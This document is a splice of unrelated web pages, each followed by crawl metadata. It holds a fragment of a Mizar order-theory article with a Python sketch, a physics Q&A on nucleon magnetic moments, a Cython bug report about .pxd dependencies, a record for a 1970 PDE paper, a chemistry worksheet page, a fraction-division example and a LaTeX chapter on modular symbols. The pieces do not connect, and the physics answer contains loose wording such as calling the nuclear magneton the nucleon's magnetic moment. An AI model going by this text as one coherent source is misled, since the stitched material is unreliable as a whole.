Th91;\nexistence\nex b1 being FinSequence of A st b1 is B -desc_ordering\nby Th92;\nend;\n\ntheorem Th93: :: ORDERS_5:81\nfor A being Preorder\nfor B being Subset of A st the 
InternalRel of A is_connected_in B holds\nthe InternalRel of () is_connected_in (proj A) .: B\nproof end;\n\ntheorem Th94: :: ORDERS_5:82\nfor A being Preorder\nfor B being Subset of A\nfor s1 being FinSequence of A st s1 is B -asc_ordering holds\nex s2 being FinSequence of () st s2 is (proj A) .: B -asc_ordering\nproof end;\n\ntheorem :: ORDERS_5:83\nfor A being Preorder\nfor B being Subset of A\nfor s1 being FinSequence of A st s1 is B -desc_ordering holds\nex s2 being FinSequence of () st s2 is (proj A) .: B -desc_ordering\nproof end;" ]
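The existence results above (ORDERS_5:77–80) are constructive: an ascending enumeration of a finite subset can be built by repeatedly splitting off an element that lies below everything that remains. The following Python sketch (not part of the Mizar article; the names `asc_ordering`, `B`, and `le` are ours) illustrates that construction under the same hypotheses, i.e. a transitive relation `le` that is connected on `B`.

```python
# Illustrative sketch only: enumerate a finite set B as a weakly ascending,
# repetition-free sequence with respect to a transitive, connected relation le.
def asc_ordering(B, le):
    remaining = list(B)
    ordering = []
    while remaining:
        x = remaining[0]
        for y in remaining[1:]:
            if not le(x, y):   # connectedness then gives le(y, x), so y is a better candidate
                x = y
        remaining.remove(x)    # x is below (or equivalent to) everything left
        ordering.append(x)
    return ordering

# Example: divisibility is transitive and connected on the chain {1, 2, 4, 8}.
print(asc_ordering({8, 1, 4, 2}, lambda a, b: b % a == 0))  # [1, 2, 4, 8]
```

For an antisymmetric relation the resulting ordering is unique (compare ORDERS_5:65), and for a linear order it agrees with SgmX as in ORDERS_5:67.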
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.75818545,"math_prob":0.98153603,"size":1610,"snap":"2022-05-2022-21","text_gpt3_token_len":589,"char_repetition_ratio":0.18929017,"word_repetition_ratio":0.43213296,"special_character_ratio":0.3757764,"punctuation_ratio":0.10059172,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9987983,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-16T09:38:07Z\",\"WARC-Record-ID\":\"<urn:uuid:0b1a885d-cf5f-46f9-9f23-0419b881fdc7>\",\"Content-Length\":\"406962\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f559aee4-fa73-45c4-8a05-5d9ae81ee210>\",\"WARC-Concurrent-To\":\"<urn:uuid:852dbe53-96ea-4077-9dd8-bffb4d7be5ec>\",\"WARC-IP-Address\":\"212.33.73.131\",\"WARC-Target-URI\":\"http://mizar.uwb.edu.pl/version/current/html/orders_5.html\",\"WARC-Payload-Digest\":\"sha1:WZZAOZCGGIBEQHCXUFMLUD3LOPV5PFQ5\",\"WARC-Block-Digest\":\"sha1:7LKL6NXALKMHVSSLUCYJJ3MBJV63NYVE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662510097.3_warc_CC-MAIN-20220516073101-20220516103101-00324.warc.gz\"}"}
https://physics.stackexchange.com/questions/311101/magnetic-moments-of-nucleons
[ "# Magnetic moments of nucleons\n\nI was comparing my notes of the nuclear physics class (undergraduate level) on magnetic moments of nucleons with the Krane's explanation.\n\nIn my notes I wrote that there are two types of magnetic moments:\n\n1. The first one is the orbital one. It's written as $\\mu_l=g_l l \\mu_n$ where l is the orbital quantum number. I also wrote that $\\vec{\\mu_l}=g_l\\vec{L}$ so that this vector is parallel to $\\vec{L}$.\n\n2. The second one is the spin one. It's written as $\\mu_s=g_ss\\mu_n$ where s is the spin quantum number, s=1/2 for nucleons. Its vectorial form is $\\vec{\\mu_s}=g_s\\vec{S}$ so that this vector is parallel to $\\vec{S}$\n\nThen, the total magnetic moment is $\\vec{\\mu_j}=\\vec{\\mu_l}+\\vec{\\mu_s}$ where $\\vec{\\mu_j}=g_j\\vec{J}$. The next step on the notes is about finding the value of $g_j$. I wrote that $|\\vec{\\mu_j}|=|\\vec{\\mu_l}|\\cos{\\theta}+|\\vec{\\mu_s}|\\cos{\\varphi}$ where $\\varphi$ is the angle between $\\vec{S}$ and $\\vec{J}$ and $\\theta$ is the angle between $\\vec{L}$ and $\\vec{J}$. In the next step I substitute $|\\vec{\\mu_l}|$ with $g_l\\hbar (l(l+1))^{1/2}$, $|\\vec{\\mu_s}|$ with $g_s\\hbar (s(s+1))^{1/2}$ and $|\\vec{\\mu_j}|$ with $g_j\\hbar (j(j+1))^{1/2}$.\n\nSo here's my problem: why is $|\\vec{\\mu_l}|$ different from $\\mu_l$? In fact the first one it's written like $g_l|\\vec{L}|$ and the second one as $\\mu_ng_ll$. The same happens with $|\\vec{\\mu_s}|$ and $\\mu_s$.\n\nAlso: In my notes I wrote that $\\vec{\\mu_j}$ isn't parallel to $\\vec{J}$ and it is, in fact, rotating about $\\vec{J}$. So why $\\vec{\\mu_j}=g_j\\vec{J}$? Shouldn't $\\vec{\\mu_j}$ and $\\vec{J}$ be parallel this way?\n\nAlso: In my notes I wrote that μj→ isn't parallel to J⃗ and it is, in fact, rotating about J⃗ . So why μj→=gjJ⃗ ? Shouldn't μj→ and J⃗ be parallel this way?>\n\nThe angular momentum operators L^2 and L(z) commute with Hamiltonian and can be measured simultaneously giving the eigenvalues l(l+1) h_bar^2 and mh_bar ,\n\nhowever the other components of L namely L(x) and L(y) do not commute along with **L(z)**so they can not be measured simultaneously...meaning thereby that direction of L remains indeterminate.\n\nso one can not talk about the specific direction of orbital angular momentum L vector .\n\nSo when we describe the magnetic moment of a nucleous mue(j) = mue(l) + mue(s) (1) then\n\nmue(l) = g(l). mue(N). sqrt (l(l+1)) ,\n\nwhere mue(N) is magnetic moment of nucleon\n\nFor neutron as it is uncharged mue(l) will be zero and for proton g(l)=1\n\nso for Proton\n\nmue(lp)= mue(N). sqrt(l(l+1)) ....(2)\n\nAs nucleons are spin 1/2 particles the QM values of intrinsic magnetic moment can be written as\n\nmue(s) = g(s). mue(N) . sqrt(s(s+1))..... (3)\n\nSo Total magnetic moment component in the j direction\n\nmue(j) = mue(l) cos (l, j) + mue(s) .cos (s,j)\n\nThose Cosine terms can be calculated in terms of l, s and j values.\n\nMoreover the last nucleon in the extreme single particle model ( in odd A nucleus) and its state is to be considered which determines the magnetic moment . For even even nucleus the resultant spin is zero.\n\nso classical description is not possible.though i have seen vector model drawing of coupling of angular momentum but\n\ni think all its diagrams are not measurable. when one imposes the external magnetic field then the projections along z axis are measured.\n\nFor details see\n\nAtomic and Nuclear Physics, Vol-II,S.N. Ghoshal,S. Chand & Co., New Delhi >India,Second Edition 1998" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.879286,"math_prob":0.99954176,"size":1608,"snap":"2019-26-2019-30","text_gpt3_token_len":538,"char_repetition_ratio":0.17955112,"word_repetition_ratio":0.04385965,"special_character_ratio":0.35261193,"punctuation_ratio":0.07716049,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999784,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-21T02:34:11Z\",\"WARC-Record-ID\":\"<urn:uuid:a7e73b21-a088-429b-b58f-798dcad28381>\",\"Content-Length\":\"140562\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3e27f49c-604c-40f8-887c-f5f6dad7f8dc>\",\"WARC-Concurrent-To\":\"<urn:uuid:9a9ffd0c-33e1-4450-a090-01a696437ae8>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/questions/311101/magnetic-moments-of-nucleons\",\"WARC-Payload-Digest\":\"sha1:VYKMV6UEOQZBEOL3OI5MXK5MMMOLOGH2\",\"WARC-Block-Digest\":\"sha1:CY6JY5ESDKEDAXFLO6JGVGLL55ITZUOA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195526818.17_warc_CC-MAIN-20190721020230-20190721042230-00504.warc.gz\"}"}
https://github.com/cython/cython/issues/3208
[ "# cythonize does not trigger a recompile when .pxd dependency has changed #3208\n\nOpen\nopened this issue Oct 25, 2019 · 0 comments\n\n###", null, "synapticarbors commented Oct 25, 2019 • edited\n If I have a `setup.py` that looks like: ```from distutils.core import setup from distutils.extension import Extension from Cython.Build import cythonize import numpy extensions = [ Extension('mod1.ftest', ['mod1/ftest.pyx'], depends=['mod1/ftypes.pxd'], include_dirs=[numpy.get_include()]) ] setup(name='', ext_modules=cythonize(extensions, language_level='3'))``` where `mod1/ftest.pyx` looks like: ```from . ftypes cimport a_type cpdef double test_func(a_type[::1] x): cdef: int i double res res = 0.0 for i in range(x.shape): res += x[i].a1 * x[i].a3 return res``` and `mod1/ftypes.pxd` looks like: ```import numpy as np cimport numpy as np cdef packed struct a_type: np.float64 ax np.int32_t a1 np.int16_t a2 np.int32_t a3``` when I modify the contents of `mod1/ftypes.pxd`, the `cythonize` call in `setup.py` does not trigger a compilation of `ftest.pyx`. If that change involved uncommenting the first line in the `struct a_type` definition, this gives an error like: `ValueError: Buffer dtype mismatch, expected 'int32_t' but got 'double' in 'a_type.a1'` when passing in a numpy recarray that assumes that the `ax` field is now defined. This might be related to #1428. As `mod1/ftypes.pxd` is a dependency of `mod1/ftest.pyx`, it seems like perhaps the dependency tree is not complete in terms of the recompilation decision process." ]
[ null, "https://avatars3.githubusercontent.com/u/589279", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8772686,"math_prob":0.6425131,"size":946,"snap":"2019-43-2019-47","text_gpt3_token_len":245,"char_repetition_ratio":0.102972396,"word_repetition_ratio":0.24113475,"special_character_ratio":0.20824525,"punctuation_ratio":0.14054054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9786327,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-12T02:17:08Z\",\"WARC-Record-ID\":\"<urn:uuid:1d848903-9eeb-47e8-b3ba-4fe954d66d77>\",\"Content-Length\":\"86026\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:083368b6-2d14-4d9f-8e33-d420137a492d>\",\"WARC-Concurrent-To\":\"<urn:uuid:c01cef13-1c67-4fc1-ba5a-0a42a43877ce>\",\"WARC-IP-Address\":\"140.82.113.4\",\"WARC-Target-URI\":\"https://github.com/cython/cython/issues/3208\",\"WARC-Payload-Digest\":\"sha1:ANXJW2TH5A4HUFIFXVLFZTMVG4ZOYJFC\",\"WARC-Block-Digest\":\"sha1:4ATAABJT66AC4OUURGYTV4E6LJKTYI3J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496664469.42_warc_CC-MAIN-20191112001515-20191112025515-00115.warc.gz\"}"}
https://ir.library.oregonstate.edu/concern/articles/4f16c3463
[ "# Article\n\n## Well-Posed Problems for a Partial Differential Equation of Order 2m + 1 Public Deposited", null, "Download PDF\nhttps://ir.library.oregonstate.edu/concern/articles/4f16c3463\n\n## Descriptions\n\nAttribute NameValues\nCreator\nAbstract\n• We are concerned here with well-posed problems for the partial differential equation uₜ(x, t) + yMuₜ(x, t) + Lu(x, t) = f(x, t) containing the elliptic differential operator M of order 2m and the differential operator L of order ≤2m. Hilbert space methods are used to formulate and solve an abstract form of the problem and to discuss existence, uniqueness, asymptotic behavior and boundary conditions of a solution. The formulation of a generalized problem is the objective of ∮ 1, and we shall have reason to consider two types of solutions, called weak and strong. Sufficient conditions on the operator M are given for the existence and uniqueness of a weak solution to the generalized problem. These conditions constitute elliptic hypotheses on M and are discussed briefly in ∮ 3. Similar assumptions on L lead to results on the asymptotic behavior of a weak solution. The case in which M and L are equal and self-adjoint is discussed in ∮ 2, and it is here that the role of the coefficient y of the equation appears first. Special as it is, this is a situation that often arises in applications, and there has been considerable interest in this coefficient y , . The weak and strong solutions are distinguished not only by regularity conditions but also by their associated boundary conditions. It first appears in ∮ 5 that it is possible to prescribe too many (independent) boundary conditions on a strong solution, but in the applications it is seen that the interdependence of these conditions is built into the assumptions on the domains of the operators. Two examples of applications appear in ∮ 6 with a discussion of the types of boundary conditions that are appropriate.\nResource Type\nDOI\nDate Available\nDate Issued\nCitation\n• Showalter, R. E. (1970). Well-posed problems for a partial differential equation of order 2m+1. SIAM Journal on Mathematical Analysis, 1(2), 214-231. doi:10.1137/0501020\nJournal Title\nJournal Volume\n• 1\nJournal Issue/Number\n• 2\nRights Statement\nRelated Items\nPublisher\nPeer Reviewed\nLanguage\nReplaces" ]
[ null, "https://ir.library.oregonstate.edu/downloads/4f16c347c", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.52334505,"math_prob":0.85598457,"size":669,"snap":"2021-31-2021-39","text_gpt3_token_len":162,"char_repetition_ratio":0.0962406,"word_repetition_ratio":0.0,"special_character_ratio":0.20627803,"punctuation_ratio":0.07865169,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9594052,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-01T13:55:20Z\",\"WARC-Record-ID\":\"<urn:uuid:622ffc35-664c-47be-83fe-140f508ebf5c>\",\"Content-Length\":\"27980\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a1adc76-20d9-4271-8118-61853c104528>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bd34a2f-c174-46b2-a84a-c48829b62c29>\",\"WARC-IP-Address\":\"128.193.164.152\",\"WARC-Target-URI\":\"https://ir.library.oregonstate.edu/concern/articles/4f16c3463\",\"WARC-Payload-Digest\":\"sha1:KJ57B3R2XJF766OJPDCO5AU475IHOABG\",\"WARC-Block-Digest\":\"sha1:IQVWTE25SDF6CTKWTRB3DS3U4QQKC3RP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154214.36_warc_CC-MAIN-20210801123745-20210801153745-00073.warc.gz\"}"}
https://smithfieldjustice.com/31-mole-worksheet-1/
[ "HomeTemplate ➟ 31 31 Mole Worksheet 1\n\n31 Mole Worksheet 1", null, "Chemistry Mole Calculation Worksheet Interactive worksheet mole conversions chem worksheet 11 3 answer key pdf, mole conversion worksheet 11 3 answers, mole conversion chem worksheet 11 3 answers, mole conversions chem worksheet 11 3 key, mole worksheet 1 moles particles answer key, image source: liveworksheets.com" ]
[ null, "https://smithfieldjustice.com/wp-content/uploads/2020/02/mole-worksheet-1.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63554895,"math_prob":0.8310547,"size":791,"snap":"2022-05-2022-21","text_gpt3_token_len":163,"char_repetition_ratio":0.27064803,"word_repetition_ratio":0.057142857,"special_character_ratio":0.18836915,"punctuation_ratio":0.1171875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9786439,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-22T12:12:07Z\",\"WARC-Record-ID\":\"<urn:uuid:d613ad5a-240e-4dc9-9244-0900e7bf221c>\",\"Content-Length\":\"33868\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3625a639-21d6-4964-b60a-ef61fdfe8edf>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d121c2e-c7cf-4cbd-991e-2f0c366115a4>\",\"WARC-IP-Address\":\"172.67.190.110\",\"WARC-Target-URI\":\"https://smithfieldjustice.com/31-mole-worksheet-1/\",\"WARC-Payload-Digest\":\"sha1:UFSTLCEAFKN76EZEXTIEN7KH5IAMO5R2\",\"WARC-Block-Digest\":\"sha1:AWRTEN4JCHFNZC3NAGO3PZXNX6VCPGGL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320303845.33_warc_CC-MAIN-20220122103819-20220122133819-00452.warc.gz\"}"}
https://answers.everydaycalculation.com/divide-fractions/9-2-divided-by-18-45
[ "Solutions by everydaycalculation.com\n\n## Divide 9/2 with 18/45\n\n1st number: 4 1/2, 2nd number: 18/45\n\n9/2 ÷ 18/45 is 45/4.\n\n#### Steps for dividing fractions\n\n1. Find the reciprocal of the divisor\nReciprocal of 18/45: 45/18\n2. Now, multiply it with the dividend\nSo, 9/2 ÷ 18/45 = 9/2 × 45/18\n3. = 9 × 45/2 × 18 = 405/36\n4. After reducing the fraction, the answer is 45/4\n5. In mixed form: 111/4\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73321223,"math_prob":0.9765787,"size":377,"snap":"2021-31-2021-39","text_gpt3_token_len":182,"char_repetition_ratio":0.19839142,"word_repetition_ratio":0.0,"special_character_ratio":0.5225464,"punctuation_ratio":0.082474224,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95967716,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-19T21:28:59Z\",\"WARC-Record-ID\":\"<urn:uuid:80e6619b-583a-494d-9dbe-4800c4177ed9>\",\"Content-Length\":\"8128\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a5c796a-5e56-4595-95d1-cac0643ad42d>\",\"WARC-Concurrent-To\":\"<urn:uuid:74026031-b613-43ff-b870-3bb5ff98829f>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/divide-fractions/9-2-divided-by-18-45\",\"WARC-Payload-Digest\":\"sha1:3CPD4S626VNIQ34OCWFBIPBOZM6ZYGP7\",\"WARC-Block-Digest\":\"sha1:SHMGPQMVGTKEKKWO56WMWBVSRJFL5CPI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780056900.32_warc_CC-MAIN-20210919190128-20210919220128-00247.warc.gz\"}"}
https://share.cocalc.com/share/5d54f9d642cd3ef1affd88397ab0db616c17e5e0/www/papers/thesis/src/modsyms.tex?viewer=share
[ "Author: William A. Stein\nCompute Environment: Ubuntu 18.04 (Deprecated)\n1\\comment{\n2% $Header: /home/was/papers/thesis/RCS/modsyms.tex,v 1.7 2000/05/10 20:31:58 was Exp$\n3\n4$Log: modsyms.tex,v$\n5Revision 1.7 2000/05/10 20:31:58 was\n6done.\n7\n8Revision 1.6 2000/05/10 08:53:23 was\n9misc. don't remember.\n10\n11Revision 1.5 2000/05/09 03:02:10 was\n12Re-indexed the whole chapter.\n13\n14Revision 1.4 2000/05/08 15:48:28 was\n15Added $Log: modsyms.tex,v$\n16Added Revision 1.7 2000/05/10 20:31:58 was\n19Added Revision 1.6 2000/05/10 08:53:23 was\n22Added Revision 1.5 2000/05/09 03:02:10 was\n25\n26}\n27\n28\n29\\chapter{Modular symbols}%\n30\\label{chap:modsym}\\index{Modular symbols}%\n31Modular symbols permeate this thesis. In their simplest incarnation,\n32modular symbols provide a finite presentation for the homology group\n33$H_1(X_0(N),\\Z)$ of the Riemann surface $X_0(N)$. This presentation\n34is equipped with such a rich structure that from it we can deduce the\n35action of the Hecke operators; this is already sufficient information for\n36us to compute a basis for the space $S_2(\\Gamma_0(N),\\C)$ of cusp\n37forms.\n38\n39We recall the definition of spaces of modular symbols in\n40Sections~\\ref{sec:defnofmodsyms}--\\ref{cuspidalsymbols}. Then in\n41Section~\\ref{sec:duality}, we review the\n42duality between modular symbols and modular forms.\n43In Section~\\ref{sec:heckeops}, we see that\n44modular symbols are furnished with analogues of each of the standard\n45operators that one finds on spaces of modular forms, and in\n46Section~\\ref{sec:degeneracymaps} we see that the same is true of the\n47degeneracy maps. Section~\\ref{sec:maninsymbols} describes Manin\n48symbols, which supply a convenient finite presentation for the space of\n49modular symbols. Finally, Section~\\ref{sec:tori} introduces the\n50complex torus attached to a newform, which appears in various guises\n51throughout this thesis.\n52\n53\n54Before continuing, we offer an apology. We will only consider modular\n55symbols that are already equipped with a fixed Dirichlet character.\n56Though fixing a character complicates the formulas, the resulting increase\n57in efficiency is of extreme value in computational applications.\n58Fixing a character allows us to compute in just the part of the space\n59of modular symbols for $\\Gamma_1(N)$ that interests us. We apologize\n60for any inconvenience this may cause the less efficiency minded\n62\n63{\\bf Acknowledgment.} This chapter and the next were greatly\n64influenced by the publications of Cremona~\\cite{cremona:gammaone,\n65cremona:algs}\\index{Cremona} and Merel~\\cite{merel:1585}\\index{Merel},\n66along with the foundational contributions of\n67Manin~\\cite{manin:parabolic}, Mazur~\\cite{mazur:arithmetic_values,\n68mazur:symboles}, and Shokurov~\\cite{sokurov:modsym}. 
Cremona's\n69book~\\cite{cremona:algs} provides a motivated roadmap that guides the\n70reader who wishes to compute with modular symbols in the familiar\n71context of elliptic curves, and Merel's\\index{Merel} article provides an accessible\n72overview of the action of Hecke operators on higher weight modular\n73symbols, and the connection between modular symbols and related\n74cohomology theories.\n75\n76\\section{The definition of modular symbols}\n77\\label{sec:defnofmodsyms}\n78Fix a positive integer~$N$, an integer $k\\geq 2$, and a continuous\n79homomorphism\n80 $$\\eps:(\\Z/N\\Z)^*\\ra\\C^*$$\n81such that $\\eps(-1)=(-1)^k$.\n82We call~$N$ the \\defn{level}\\index{Level of modular symbols|textit},~$k$ the\n83\\defn{weight}\\index{Weight of modular symbols|textit},\n84and~$\\eps$ the \\defn{Dirichlet character}.\\index{Dirichlet character|textit}\n85\n86\n87Consider the quotient of the abelian group generated by all formal symbols\n88$\\{\\alp,\\beta\\}$, with $\\alp, \\beta\\in\\P^1(\\Q)=\\Q\\union\\{\\infty\\}$,\n89by the following relations:\n90 $$\\{\\alp,\\beta\\}+\\{\\beta,\\gamma\\}+\\{\\gamma,\\alp\\} = 0,$$\n91for all $\\alp,\\beta,\\gamma\\in\\P^1(\\Q)$.\n92Let $\\sM$ be the torsion-free quotient of this group by its torsion\n93subgroup. Because $\\sM$ is torsion free, $\\{\\alp,\\alp\\}=0$ and\n94$\\{\\alp,\\beta\\} = -\\{\\beta,\\alp\\}$.\n95\\index{Modular symbols!relations satisfied by}\n96\n97\\begin{remark}\n98One is motivated to consider these relations by viewing\n99$\\{\\alp,\\beta\\}$ as the homology class of an appropriate\n100path from~$\\alpha$ to~$\\beta$ in the upper half plane.\n101\\end{remark}\n102\n103Let $V_{k-2}$\\label{defn:vk} be the $\\Z$-submodule of $\\Z[X,Y]$ made up of\n104all homogeneous polynomials of degree $k-2$, and set\n105 $\\sM_k := V_{k-2}\\tensor\\sM.$\n106\\label{pg:higherweightmodsym}\n107For $g=\\abcd{a}{b}{c}{d}\\in\\GL_2(\\Q)$ and $P\\in V_{k-2}$, let\n108\\begin{align*}\n109 gP(X,Y) &= P\\left(\\det(g)g^{-1}\\vtwo{X}{Y}\\right)\n110 = P\\left(\\mtwo{\\hfill d}{-b}{-c}{\\hfill a}\\vtwo{X}{Y}\\right)\\\\\n111 &= P(dX-bY,-cX+aY).\n112\\end{align*}\n113This defines a left action of $\\GL_2(\\Q)$ on $V_{k-2}$;\n114it is a left action because\n115\\begin{align*}\n116 (gh)P(v) &= P(\\det(gh)(gh)^{-1}v)\n117 = P(\\det(h)h^{-1}\\det(g)g^{-1}v)\\\\\n118 &= gP(\\det(h)h^{-1}v) = g(hP(v)).\n119\\end{align*}\n120Combining this action with the action of $\\GL_2(\\Q)$ on $\\P^1(\\Q)$\n121by linear fractional transformations gives\n122a left action of $\\GL_2(\\Q)$ on $\\sM_k$:\n123 $$g (P \\tensor \\{\\alp,\\beta\\}) = g(P)\\tensor\\{g(\\alp),g(\\beta)\\}.$$\n124Finally, for $g=\\abcd{a}{b}{c}{d}\\in\\Gamma_0(N)$, let\n125$\\eps(g) := \\eps(\\overline{a})$,\n126where $\\overline{a}\\in\\Z/N\\Z$ is the reduction modulo~$N$ of~$a$.\n127\n128Let\n129$$\\Z[\\eps] := \\Z[\\eps(a) : a \\in \\Z/N\\Z]$$\n130be the subring of~$\\C$ generated by the values of the\n131character~$\\eps$.\n132\\begin{definition}[Modular symbols]\\label{defn:modsym}\n133\\index{Modular symbols|textit}%\n134The space of \\defn{modular symbols} $\\sM_k(N,\\eps)$\n135of level~$N$, weight~$k$ and character~$\\eps$ is\n136the largest torsion-free quotient of $\\sM_k\\tensor\\Z[\\eps]$ by the\n137$\\Z[\\eps]$-submodule generated by the\n138relations $gx-\\eps(g)x$ for all $x\\in\\sM_k$\n139and all $g\\in\\Gamma_0(N)$.\n140\\end{definition}\n141Denote by $P\\{\\alp,\\beta\\}$ the image\n142of $P\\tensor\\{\\alp,\\beta\\}$ in $\\sM_k(N,\\eps)$.\n143For any $\\Z[\\eps]$-algebra~$R$, 
let\n144$$\\sM_k(N,\\eps;R) := \\sM_k(N,\\eps)\\tensor_{Z[\\eps]} R.$$\n145See Section~\\ref{sec:computingmk} for an algorithm which\n146can be used to compute $\\sM_k(N,\\eps;\\Q(\\eps))$.\n147\n148\\section{Cuspidal modular symbols}\n149\\label{cuspidalsymbols}\n150\\index{Cuspidal modular symbols|textit}\n151Let~$\\sB$ be the free abelian group generated by the symbols\n152$\\{\\alp\\}$ for all $\\alp\\in\\P^1(\\Q)$.\n153There is a left action of~$\\GL_2(\\Q)$ on~$\\sB$ given by\n154$g\\{\\alp\\}=\\{g(\\alp)\\}$.\n155Let $\\sB_k := V_{k-2}\\tensor \\sB$, and let $\\GL_2(\\Q)$ act\n156on $\\sB_k$ by $g(P\\{\\alp\\}) = (gP)\\{g(\\alp)\\}$.\n157\\begin{definition}[Boundary modular symbols]\\label{def:boundarysymbols}\n158The space $\\sB_k(N,\\eps)$ of\n159\\index{Boundary modular symbols|textit}%\n160\\defn{boundary modular symbols}\n161is the largest torsion-free quotient\n162of $\\sB_k\\tensor\\Z[\\eps]$ by the relations\n163$gx = \\eps(g) x$ for all\n164$g\\in \\Gamma_0(N)$ and $x\\in \\sB_k$.\n165\\end{definition}\n166Denote by $P\\{\\alp\\}$ the image of $P\\tensor\\{\\alp\\}$\n167in $\\sB_k(N,\\eps)$.\n168The \\defn{boundary map}\n169 $$\\delta: \\sM_k(N,\\eps) \\ra \\sB_k(N,\\eps)$$\n170is defined by\n171 $$\\delta(P\\{\\alp,\\beta\\}) = 172 P\\{\\beta\\}-P\\{\\alp\\}.$$\n173\\begin{definition}[Cuspidal modular symbols]%\n174\\label{defn:cuspidalmodularsymbols}%\n175\\index{Cuspidal modular symbols|textit}%\n176The space $\\sS_k(N,\\eps)$ of\n177\\defn{cuspidal modular symbols}\n178is the kernel of~$\\delta$.\n179\\end{definition}\n180The three spaces defined above fit together in the\n181following exact sequence:\n182 $$0\\ra \\sS_k(N,\\eps) \\ra\\sM_k(N,\\eps)\\xrightarrow{\\,\\delta\\,} 183 \\sB_k(N,\\eps).$$\n184\n185\n186\n187\\section{Duality between modular symbols and modular forms}%\n188\\label{sec:duality}\n189\\index{Modular symbols!duality with modular forms}%\n190\\index{Modular forms!duality with modular symbols}%\n191\\index{Integration pairing}%\n192For any positive integer~$k$, any $\\C$-valued function~$f$ on\n193the complex upper half plane\n194$$\\h:=\\{z \\in \\C : \\im(z) > 0\\},$$\n195and any matrix $\\gamma\\in\\GL_2(\\Q)$, define a function\n196$f|[\\gamma]_k$ on~$\\h$ by\n197 $$(f|[\\gamma]_k)(z) = \\det(\\gamma)^{k-1}\\frac{f(\\gamma z)}{(cz+d)^{k}}.$$\n198\\begin{definition}[Cusp forms]\\index{Cusp forms|textit}\n199Let $S_k(N,\\eps)$ be the complex vector space of holomorphic\n200functions $f(z)$ on~$\\h$ that satisfy\n201the equation\n202 $$f|[\\gamma]_k = \\eps(\\gamma)f$$\n203for all $\\gamma\\in\\Gamma_0(N)$, and such that~$f$\n204is holomorphic and vanishes at all cusps, in the sense of\n205\\cite[pg.~42]{diamond-im}.\n206\\end{definition}\n207\n208\\begin{definition}[Antiholomorphic cusp forms]%\n209\\index{Cusp forms!antiholomorphic|textit}%\n210\\index{Antiholomorphic cusp forms|textit}\n211Let $\\Sbar_k(N,\\eps)$ be the space of\n212\\defn{antiholomorphic cusp forms};\n213the definition is as above, except\n214$$\\frac{f(\\gamma z)}{(c\\overline{z}+d)^k} = \\overline{\\eps}(\\gamma) f(z)$$\n215for all $\\gamma\\in\\Gamma_0(N)$.\\footnote{The $\\overline{\\eps}$\n216should be replaced by~$\\eps$ in this formula, as\n217in \\cite[\\S2.5]{merel:1585}.}\n218\\end{definition}\n219There is a canonical isomorphism of real vector spaces\n220between $S_k(N,\\eps)$ and $\\Sbar_k(N,\\eps)$ that associates\n221to~$f$ the antiholomorphic cusp form defined by the function\n222$z\\mapsto 
